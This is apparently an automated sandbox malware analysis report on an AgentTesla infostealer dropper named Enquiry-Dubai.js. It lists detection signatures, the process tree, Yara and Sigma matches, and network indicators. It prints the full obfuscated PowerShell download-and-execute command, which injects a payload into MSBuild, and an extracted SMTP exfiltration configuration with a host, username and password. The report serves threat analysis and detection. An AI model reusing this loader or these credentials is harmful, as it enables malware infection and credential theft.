Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
Enquiry-Dubai.js

Overview

General Information

Sample name:Enquiry-Dubai.js
Analysis ID:1646313
MD5:5e554206a8a10362c32d4f106ce72a98
SHA1:9a7ab75af22bb0ed7e0a3feb49eef5cff3d22aba
SHA256:61d6d15b22aed7572cca9b5785f07f02eec562a4142c2fb8605dabc89d7710b5
Tags:jsuser-contact4abubaker
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Sigma detected: MSBuild connects to smtp port
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
JavaScript source code contains functionality to generate code involving a shell, file or stream
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7544 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Enquiry-Dubai.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 8188 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command ""$Codigo = 'JslanshacksBtslanshacksG8slanshacksdslanshacksBvslanshacksHIslanshacksYgBpslanshacksGsslanshacksZQBkslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCcslanshacksIwB4slanshacksCMslanshacksLgslanshackszslanshacksDIslanshacksMgslanshacksvslanshacksHYslanshacksZQBkslanshacksC4slanshacksMgByslanshacksC4slanshacksMgslanshacks5slanshacksGQslanshacksMwslanshacks5slanshacksDMslanshacksZQBjslanshacksGYslanshacksMslanshacksslanshacksyslanshacksDUslanshacksOslanshacksslanshacks2slanshacksGQslanshacksYQBislanshacksGYslanshacksMslanshacksslanshacks0slanshacksGYslanshacksMslanshacksBlslanshacksGEslanshacksMslanshacksBkslanshacksDslanshacksslanshacksYgBmslanshacksDcslanshacksZgslanshacks2slanshacksC0slanshacksYgB1slanshacksHslanshacksslanshacksLwslanshacksvslanshacksDoslanshackscwBwslanshacksCMslanshacksIwBoslanshacksCcslanshacksOwslanshackskslanshacksHMslanshacksaslanshacksBhslanshacksG0slanshacksYQB0slanshacksGUslanshacksdQByslanshacksGkslanshackscwBtslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCQslanshacksbQBvslanshacksHQslanshacksbwByslanshacksGIslanshacksaQBrslanshacksGUslanshacksZslanshacksslanshacksgslanshacksC0slanshackscgBlslanshacksHslanshacksslanshacksbslanshacksBhslanshacksGMslanshacksZQslanshacksgslanshacksCcslanshacksIwslanshacksnslanshacksCwslanshacksIslanshacksslanshacksnslanshacksHQslanshacksJwslanshacks7slanshacksCQslanshacksaslanshacksBlslanshacksG4slanshacksYwBoslanshacksGkslanshacksbgBnslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCcslanshacksaslanshacksB0slanshacksHQslanshackscslanshacksBzslanshacksDoslanshacksLwslanshacksvslanshacksGkslanshacksYQslanshacks2slanshacksDslanshacksslanshacksMslanshacksslanshacksyslanshacksDslanshacksslanshacksNslanshacksslanshacksuslanshacksHUslanshackscwslanshacksuslanshacksGEslanshackscgBjslanshacksGgslanshacksaQB2slanshacksGUslanshacksLgBvslanshacksHIslanshacksZwslanshacksvslanshacksDIslanshacksNQslanshacksvslanshacksGkslanshacksdslanshacksBlslanshacksG0slanshackscwslanshacksvslanshacksG4slanshacksZQB3slanshacksF8slanshacksaQBtslanshacksGEslanshacksZwBlslanshacksF8slanshacksMgslanshackswslanshacksDIslanshacksNQslanshackswslanshacksDMslanshacksMQslanshacks4slanshacksC8slanshacksbgBlslanshacksHcslanshacksXwBpslanshacksG0slanshacksYQBnslanshacksGUslanshacksLgBqslanshacksHslanshacksslanshacksZwslanshacksnslanshacksDsslanshacksJslanshacksBwslanshacksGEslanshackscgB0slanshacksGkslanshacksYwBpslanshacksHslanshacksslanshacksYQBuslanshacksGMslanshackseQslanshacksgslanshacksD0slanshacksIslanshacksBOslanshacksGUslanshacksdwslanshackstslanshacksE8slanshacksYgBqslanshacksGUslanshacksYwB0slanshacksCslanshacksslanshacksUwB5slanshacksHMslanshacksdslanshacksBlslanshacksG0slanshacksLgBOslanshacksGUslanshacksdslanshacksslanshacksuslanshacksFcslanshacksZQBislanshacksEMslanshacksbslanshacksBpslanshacksGUslanshacksbgB0slanshacksDsslanshacksJslanshacksBzslanshacksGMslanshacksbwB1slanshacksHIslanshackscwBlslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCQslanshackscslanshacksBhslanshacksHIslanshacksdslanshacksBpslanshacksGMslanshacksaQBwslanshacksGEslanshacksbgBjslanshacksHkslanshacksLgBEslanshacksG8slanshacksdwBuslanshacksGwslanshacksbwBhslanshacksGQslanshacksRslanshacksBhslanshacksHQslanshacksYQslanshacksoslanshacksCQslanshacksaslanshacksBlslanshacksG4slanshacksYwBoslanshacksGkslanshacksbgBnslanshacksCkslanshacksOwslanshackskslanshacksHIslanshacksYQBkslanshacksGkslanshacksbwBzslanshacksHkslanshacksbQBtslanshacksGUslanshacksdslanshacksByslanshacksHkslanshacksIslanshacksslanshacks9slanshacksCslanshacksslanshacksWwBTslanshacksHkslanshackscwB0slanshacksGUslanshacksbQslanshacksuslanshacksFQslanshacksZQB4slanshacksHQslanshacksLgBFslanshacksG4slanshacksYwBvslanshacksGQslanshacksaQBuslanshacksGcslanshacksXQslanshacks6slanshacksDoslanshacksVQBUslanshacksEYslanshacksOslanshacksslanshacksuslanshacksEcslanshacksZQB0slanshacksFMslanshacksdslanshacksByslanshacksGkslanshacksbgBnslanshacksCgslanshacksJslanshacksBzslanshacksGMslanshacksbwB1slanshacksHIslanshackscwBlslanshacksCkslanshacksOwslanshackskslanshacksGMslanshackseQB0slanshacksG8slanshacksbQBlslanshacksHQslanshacksZQByslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCcslanshacksPslanshacksslanshacks8slanshacksEIslanshacksQQBTslanshacksEUslanshacksNgslanshacks0slanshacksF8slanshacksUwBUslanshacksEEslanshacksUgBUslanshacksD4slanshacksPgslanshacksnslanshacksDsslanshacksJslanshacksB0slanshacksHYslanshacksaQB4slanshacksGIslanshacksbwB4slanshacksCslanshacksslanshacksPQslanshacksgslanshacksCcslanshacksPslanshacksslanshacks8slanshacksEIslanshacksQQBTslanshacksEUslanshacksNgslanshacks0slanshacksF8slanshacksRQBOslanshacksEQslanshacksPgslanshacks+slanshacksCcslanshacksOwslanshackskslanshacksGgslanshacksbwBtslanshacksG8slanshackscslanshacksBsslanshacksGEslanshackscwB0slanshacksCslanshacksslanshacksPQslanshacksgslanshacksCQslanshackscgBhslanshacksGQslanshacksaQBvslanshacksHMslanshackseQBtslanshacksG0slanshacksZQB0slanshacksHIslanshackseQslanshacksuslanshacksEkslanshacksbgBkslanshacksGUslanshackseslanshacksBPslanshacksGYslanshacksKslanshacksslanshackskslanshacksGMslanshackseQB0slanshacksG8slanshacksbQBlslanshacksHQslanshacksZQByslanshacksCkslanshacksOwslanshackskslanshacksHQslanshacksZQB0slanshacksHIslanshacksYQBzslanshacksHQslanshacksaQBjslanshacksGgslanshacksbwB1slanshacksHMslanshacksIslanshacksslanshacks9slanshacksCslanshacksslanshacksJslanshacksByslanshacksGEslanshacksZslanshacksBpslanshacksG8slanshackscwB5slanshacksG0slanshacksbQBlslanshacksHQslanshackscgB5slanshacksC4slanshacksSQBuslanshacksGQslanshacksZQB4slanshacksE8slanshacksZgslanshacksoslanshacksCQslanshacksdslanshacksB2slanshacksGkslanshackseslanshacksBislanshacksG8slanshackseslanshacksslanshackspslanshacksDsslanshacksJslanshacksBoslanshacksG8slanshacksbQBvslanshacksHslanshacksslanshacksbslanshacksBhslanshacksHMslanshacksdslanshacksslanshacksgslanshacksC0slanshacksZwBlslanshacksCslanshacksslanshacksMslanshacksslanshacksgslanshacksC0slanshacksYQBuslanshacksGQslanshacksIslanshacksslanshackskslanshacksHQslanshacksZQB0slanshacksHIslanshacksYQBzslanshacksHQslanshacksaQBjslanshacksGgslanshacksbwB1slanshacksHMslanshacksIslanshacksslanshackstslanshacksGcslanshacksdslanshacksslanshacksgslanshacksCQslanshacksaslanshacksBvslanshacksG0slanshacksbwBwslanshacksGwslanshacksYQBzslanshacksHQslanshacksOwslanshackskslanshacksGgslanshacksbwBtslanshacksG8slanshackscslanshacksBsslanshacksGEslanshackscwB0slanshacksCslanshacksslanshacksKwslanshacks9slanshacksCslanshacksslanshacksJslanshacksBjslanshacksHkslanshacksdslanshacksBvslanshacksG0slanshacksZQB0slanshacksGUslanshackscgslanshacksuslanshacksEwslanshacksZQBuslanshacksGcslanshacksdslanshacksBoslanshacksDsslanshacksJslanshacksByslanshacksGUslanshacksZwByslanshacksGUslanshackscwBzslanshacksGkslanshacksdgBlslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCQslanshacksdslanshacksBlslanshacksHQslanshackscgBhslanshacksHMslanshacksdslanshacksBpslanshacksGMslanshacksaslanshacksBvslanshacksHUslanshackscwslanshacksgslanshacksC0slanshacksIslanshacksslanshackskslanshacksGgslanshacksbwBtslanshacksG8slanshackscslanshacksBsslanshacksGEslanshackscwB0slanshacksDsslanshacksJslanshacksBislanshacksGEslanshacksbslanshacksBkslanshacksG4slanshacksZQBzslanshacksHMslanshacksIslanshacksslanshacks9slanshacksCslanshacksslanshacksJslanshacksByslanshacksGEslanshacksZslanshacksBpslanshacksG8slanshackscwB5slanshacksG0slanshacksbQBlslanshacksHQslanshackscgB5slanshacksC4slanshacksUwB1slanshacksGIslanshackscwB0slanshacksHIslanshacksaQBuslanshacksGcslanshacksKslanshacksslanshackskslanshacksGgslanshacksbwBtslanshacksG8slanshackscslanshacksBsslanshacksGEslanshackscwB0slanshacksCwslanshacksIslanshacksslanshackskslanshacksHIslanshacksZQBnslanshacksHIslanshacksZQBzslanshacksHMslanshacksaQB2slanshacksGUslanshacksKQslanshacks7slanshacksCQslanshacksYQBuslanshacksHQslanshacksaQBzslanshacksGkslanshackscslanshacksBoslanshacksG8slanshacksbgBhslanshacksGwslanshacksIslanshacksslanshacks9slanshacksCslanshacksslanshacksWwBTslanshacksHkslanshackscwB0slanshacksGUslanshacksbQslanshacksuslanshacksEMslanshacksbwBuslanshacksHYslanshacksZQByslanshacksHQslanshacksXQslanshacks6slanshacksDoslanshacksRgByslanshacksG8slanshacksbQBCslanshacksGEslanshackscwBlslanshacksDYslanshacksNslanshacksBTslanshacksHQslanshackscgBpslanshacksG4slanshacksZwslanshacksoslanshacksCQslanshacksYgBhslanshacksGwslanshacksZslanshacksBuslanshacksGUslanshackscwBzslanshacksCkslanshacksOwslanshackskslanshacksG8slanshackscgBsslanshacksGEslanshacksZwBlslanshacksCslanshacksslanshacksPQslanshacksgslanshacksFsslanshacksUwB5slanshacksHMslanshacksdslanshacksBlslanshacksG0slanshacksLgBSslanshacksGUslanshacksZgBsslanshacksGUslanshacksYwB0slanshacksGkslanshacksbwBuslanshacksC4slanshacksQQBzslanshacksHMslanshacksZQBtslanshacksGIslanshacksbslanshacksB5slanshacksF0slanshacksOgslanshacks6slanshacksEwslanshacksbwBhslanshacksGQslanshacksKslanshacksslanshackskslanshacksGEslanshacksbgB0slanshacksGkslanshackscwBpslanshacksHslanshacksslanshacksaslanshacksBvslanshacksG4slanshacksYQBsslanshacksCkslanshacksOwslanshackskslanshacksGMslanshacksZQBuslanshacksHQslanshackscgBhslanshacksGwslanshacksaQBzslanshacksGUslanshacksZslanshacksslanshacksgslanshacksD0slanshacksIslanshacksBbslanshacksGQslanshacksbgBsslanshacksGkslanshacksYgslanshacksuslanshacksEkslanshacksTwslanshacksuslanshacksEgslanshacksbwBtslanshacksGUslanshacksXQslanshacksuslanshacksEcslanshacksZQB0slanshacksE0slanshacksZQB0slanshacksGgslanshacksbwBkslanshacksCgslanshacksJwBWslanshacksEEslanshacksSQslanshacksnslanshacksCkslanshacksLgBJslanshacksG4slanshacksdgBvslanshacksGsslanshacksZQslanshacksoslanshacksCQslanshacksbgB1slanshacksGwslanshacksbslanshacksslanshackssslanshacksCslanshacksslanshacksWwBvslanshacksGIslanshacksagBlslanshacksGMslanshacksdslanshacksBbslanshacksF0slanshacksXQslanshacksgslanshacksEslanshacksslanshacksKslanshacksslanshackskslanshacksHMslanshacksaslanshacksBhslanshacksG0slanshacksYQB0slanshacksGUslanshacksdQByslanshacksGkslanshackscwBtslanshacksCwslanshacksJwslanshacksnslanshacksCwslanshacksJwslanshacksnslanshacksCwslanshacksJwslanshacksnslanshacksCwslanshacksJwBNslanshacksFMslanshacksQgB1slanshacksGkslanshacksbslanshacksBkslanshacksCcslanshacksLslanshacksslanshacksnslanshacksCcslanshacksLslanshacksslanshacksnslanshacksCcslanshacksLslanshacksslanshacksnslanshacksCcslanshacksLslanshacksslanshacksnslanshacksCcslanshacksLslanshacksslanshacksnslanshacksCcslanshacksLslanshacksslanshacksnslanshacksCcslanshacksLslanshacksslanshacksnslanshacksCcslanshacksLslanshacksslanshacksnslanshacksCcslanshacksLslanshacksslanshacksnslanshacksCcslanshacksLslanshacksslanshacksnslanshacksCcslanshacksLslanshacksslanshacksnslanshacksDIslanshacksJwslanshackspslanshacksCkslanshacks'; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('slanshacks','A'))); Invoke-Expression $OWjuxd"" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 3028 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{
  "Exfil Mode": "SMTP",
  "Port": "587",
  "Host": "mail.detarcoopmedical.com",
  "Username": "mail@detarcoopmedical.com",
  "Password": "To$zL%?nhDHN"
}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.2482251027.0000000002F13000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    0000000A.00000002.2482251027.0000000002F13000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      0000000A.00000002.2473875067.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000A.00000002.2473875067.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          0000000A.00000002.2482251027.0000000002F5B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 9 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            10.2.MSBuild.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              10.2.MSBuild.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                10.2.MSBuild.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x34881:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x348f3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x3497d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x34a0f:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x34a79:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x34aeb:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x34b81:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x34c11:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                7.2.powershell.exe.1ae117de740.7.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  7.2.powershell.exe.1ae117de740.7.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    Click to see the 7 entries

                    Other

                    SourceRuleDescriptionAuthorStrings
                    amsi64_8188.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                      amsi64_8188.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                        Sigma Signatures

                        Networking

                        barindex
                        Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 161.97.124.96, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 3028, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49725

                        System Summary

                        barindex
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command ""$Codigo = 'JslanshacksBtslanshacksG8slanshacksdslanshacksBvslanshacksHIslanshacksYgBpslanshacksGsslanshacksZQBkslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCcslanshacksIwB4slanshacksCMslanshacksLgslanshackszslanshacksDIslanshacksMgslanshacksvslanshacksHYslanshacksZQBkslanshacksC4slanshacksMgByslanshacksC4slanshacksMgslanshacks5slanshacksGQslanshacksMwslanshacks5slanshacksDMslanshacksZQBjslanshacksGYslanshacksMslanshacksslanshacksyslanshacksDUslanshacksOslanshacksslanshacks2slanshacksGQslanshacksYQBislanshacksGYslanshacksMslanshacksslanshacks0slanshacksGYslanshacksMslanshacksBlslanshacksGEslanshacksMslanshacksBkslanshacksDslanshacksslanshacksYgBmslanshacksDcslanshacksZgslanshacks2slanshacksC0slanshacksYgB1slanshacksHslanshacksslanshacksLwslanshacksvslanshacksDoslanshackscwBwslanshacksCMslanshacksIwBoslanshacksCcslanshacksOwslanshackskslanshacksHMslanshacksaslanshacksBhslanshacksG0slanshacksYQB0slanshacksGUslanshacksdQByslanshacksGkslanshackscwBtslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCQslanshacksbQBvslanshacksHQslanshacksbwByslanshacksGIslanshacksaQBrslanshacksGUslanshacksZslanshacksslanshacksgslanshacksC0slanshackscgBlslanshacksHslanshacksslanshacksbslanshacksBhslanshacksGMslanshacksZQslanshacksgslanshacksCcslanshacksIwslanshacksnslanshacksCwslanshacksIslanshacksslanshacksnslanshacksHQslanshacksJwslanshacks7slanshacksCQslanshacksaslanshacksBlslanshacksG4slanshacksYwBoslanshacksGkslanshacksbgBnslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCcslanshacksaslanshacksB0slanshacksHQslanshackscslanshacksBzslanshacksDoslanshacksLwslanshacksvslanshacksGkslanshacksYQslanshacks2slanshacksDslanshacksslanshacksMslanshacksslanshacksyslanshacksDslanshacksslanshacksNslanshacksslanshacksuslanshacksHUslanshackscwslanshacksuslanshacksGEslanshackscgBjslanshacksGgslanshacksaQB2slanshacksGUslanshacksLgBvslanshacksHIslanshacksZwslanshacksvslanshacksDIslanshacksNQslanshacksvslanshacksGkslanshacksdslanshacksBlslanshacksG0slanshackscwslanshacksvslanshacksG4slanshacksZQB3slanshacksF8slanshacksaQBtslanshacksGEslanshacksZwBlslanshacksF8slanshacksMgslanshackswslanshacksDIslanshacksNQslanshackswslanshacksDMslanshacksMQslanshacks4slanshacksC8slanshacksbgBlslanshacksHcslanshacksXwBpslanshacksG0slanshacksYQBnslanshacksGUslanshacksLgBqslanshacksHslanshacksslanshacksZwslanshacksnslanshacksDsslanshacksJslanshacksBwslanshacksGEslanshackscgB0slanshacksGkslanshacksYwBpslanshacksHslanshacksslanshacksYQBuslanshacksGMslanshackseQslanshacksgslanshacksD0slanshacksIslanshacksBOslanshacksGUslanshacksdwslanshackstslanshacksE8slanshacksYgBqslanshacksGUslanshacksYwB0slanshacksCslanshacksslanshacksUwB5slanshacksHMslanshacksdslanshacksBlslanshacksG0slanshacksLgBOslanshacksGUslanshacksdslanshacksslanshacksuslanshacksFcslanshacksZQBislanshacksEMslanshacksbslanshacksBpslanshacksGUslanshacksbgB0slanshacksDsslanshacksJslanshacksBzslanshacksGMslanshacksbwB1slanshacksHIslanshacksc
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command ""$Codigo = 'JslanshacksBtslanshacksG8slanshacksdslanshacksBvslanshacksHIslanshacksYgBpslanshacksGsslanshacksZQBkslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCcslanshacksIwB4slanshacksCMslanshacksLgslanshackszslanshacksDIslanshacksMgslanshacksvslanshacksHYslanshacksZQBkslanshacksC4slanshacksMgByslanshacksC4slanshacksMgslanshacks5slanshacksGQslanshacksMwslanshacks5slanshacksDMslanshacksZQBjslanshacksGYslanshacksMslanshacksslanshacksyslanshacksDUslanshacksOslanshacksslanshacks2slanshacksGQslanshacksYQBislanshacksGYslanshacksMslanshacksslanshacks0slanshacksGYslanshacksMslanshacksBlslanshacksGEslanshacksMslanshacksBkslanshacksDslanshacksslanshacksYgBmslanshacksDcslanshacksZgslanshacks2slanshacksC0slanshacksYgB1slanshacksHslanshacksslanshacksLwslanshacksvslanshacksDoslanshackscwBwslanshacksCMslanshacksIwBoslanshacksCcslanshacksOwslanshackskslanshacksHMslanshacksaslanshacksBhslanshacksG0slanshacksYQB0slanshacksGUslanshacksdQByslanshacksGkslanshackscwBtslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCQslanshacksbQBvslanshacksHQslanshacksbwByslanshacksGIslanshacksaQBrslanshacksGUslanshacksZslanshacksslanshacksgslanshacksC0slanshackscgBlslanshacksHslanshacksslanshacksbslanshacksBhslanshacksGMslanshacksZQslanshacksgslanshacksCcslanshacksIwslanshacksnslanshacksCwslanshacksIslanshacksslanshacksnslanshacksHQslanshacksJwslanshacks7slanshacksCQslanshacksaslanshacksBlslanshacksG4slanshacksYwBoslanshacksGkslanshacksbgBnslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCcslanshacksaslanshacksB0slanshacksHQslanshackscslanshacksBzslanshacksDoslanshacksLwslanshacksvslanshacksGkslanshacksYQslanshacks2slanshacksDslanshacksslanshacksMslanshacksslanshacksyslanshacksDslanshacksslanshacksNslanshacksslanshacksuslanshacksHUslanshackscwslanshacksuslanshacksGEslanshackscgBjslanshacksGgslanshacksaQB2slanshacksGUslanshacksLgBvslanshacksHIslanshacksZwslanshacksvslanshacksDIslanshacksNQslanshacksvslanshacksGkslanshacksdslanshacksBlslanshacksG0slanshackscwslanshacksvslanshacksG4slanshacksZQB3slanshacksF8slanshacksaQBtslanshacksGEslanshacksZwBlslanshacksF8slanshacksMgslanshackswslanshacksDIslanshacksNQslanshackswslanshacksDMslanshacksMQslanshacks4slanshacksC8slanshacksbgBlslanshacksHcslanshacksXwBpslanshacksG0slanshacksYQBnslanshacksGUslanshacksLgBqslanshacksHslanshacksslanshacksZwslanshacksnslanshacksDsslanshacksJslanshacksBwslanshacksGEslanshackscgB0slanshacksGkslanshacksYwBpslanshacksHslanshacksslanshacksYQBuslanshacksGMslanshackseQslanshacksgslanshacksD0slanshacksIslanshacksBOslanshacksGUslanshacksdwslanshackstslanshacksE8slanshacksYgBqslanshacksGUslanshacksYwB0slanshacksCslanshacksslanshacksUwB5slanshacksHMslanshacksdslanshacksBlslanshacksG0slanshacksLgBOslanshacksGUslanshacksdslanshacksslanshacksuslanshacksFcslanshacksZQBislanshacksEMslanshacksbslanshacksBpslanshacksGUslanshacksbgB0slanshacksDsslanshacksJslanshacksBzslanshacksGMslanshacksbwB1slanshacksHIslanshacksc
                        Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 208.95.112.1, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 3028, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49724
                        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Enquiry-Dubai.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Enquiry-Dubai.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Enquiry-Dubai.js", ProcessId: 7544, ProcessName: wscript.exe
                        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Enquiry-Dubai.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Enquiry-Dubai.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Enquiry-Dubai.js", ProcessId: 7544, ProcessName: wscript.exe
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command ""$Codigo = 'JslanshacksBtslanshacksG8slanshacksdslanshacksBvslanshacksHIslanshacksYgBpslanshacksGsslanshacksZQBkslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCcslanshacksIwB4slanshacksCMslanshacksLgslanshackszslanshacksDIslanshacksMgslanshacksvslanshacksHYslanshacksZQBkslanshacksC4slanshacksMgByslanshacksC4slanshacksMgslanshacks5slanshacksGQslanshacksMwslanshacks5slanshacksDMslanshacksZQBjslanshacksGYslanshacksMslanshacksslanshacksyslanshacksDUslanshacksOslanshacksslanshacks2slanshacksGQslanshacksYQBislanshacksGYslanshacksMslanshacksslanshacks0slanshacksGYslanshacksMslanshacksBlslanshacksGEslanshacksMslanshacksBkslanshacksDslanshacksslanshacksYgBmslanshacksDcslanshacksZgslanshacks2slanshacksC0slanshacksYgB1slanshacksHslanshacksslanshacksLwslanshacksvslanshacksDoslanshackscwBwslanshacksCMslanshacksIwBoslanshacksCcslanshacksOwslanshackskslanshacksHMslanshacksaslanshacksBhslanshacksG0slanshacksYQB0slanshacksGUslanshacksdQByslanshacksGkslanshackscwBtslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCQslanshacksbQBvslanshacksHQslanshacksbwByslanshacksGIslanshacksaQBrslanshacksGUslanshacksZslanshacksslanshacksgslanshacksC0slanshackscgBlslanshacksHslanshacksslanshacksbslanshacksBhslanshacksGMslanshacksZQslanshacksgslanshacksCcslanshacksIwslanshacksnslanshacksCwslanshacksIslanshacksslanshacksnslanshacksHQslansh